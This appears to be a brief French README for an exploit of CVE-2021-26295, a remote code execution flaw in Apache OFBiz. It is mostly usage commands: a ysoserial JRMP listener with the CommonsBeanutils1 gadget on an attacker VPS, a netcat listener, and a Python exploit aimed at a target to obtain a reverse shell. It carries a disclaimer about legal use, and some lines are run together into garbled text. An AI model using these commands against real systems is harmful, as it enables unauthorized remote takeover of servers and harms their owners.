
Exploit pour CVE-2021-26295 (RCE Apache OFBiz) utilisant l'écouteur JRMP ysoserial pour exécuter des commandes et obtenir un reverse shell sur des cibles vulnérables.
CVE-2021-26295 EXP permet d'obtenir un shell inversé avec succès
Ce document et cet outil sont uniquement destinés au partage technique. Toute utilisation illégale est strictement interdite. L'utilisateur assume seul toutes les conséquences.
RMI sur le VPS sur le port 9999java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[commande à exécuter]'
nc64444nc -lvp 64444
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

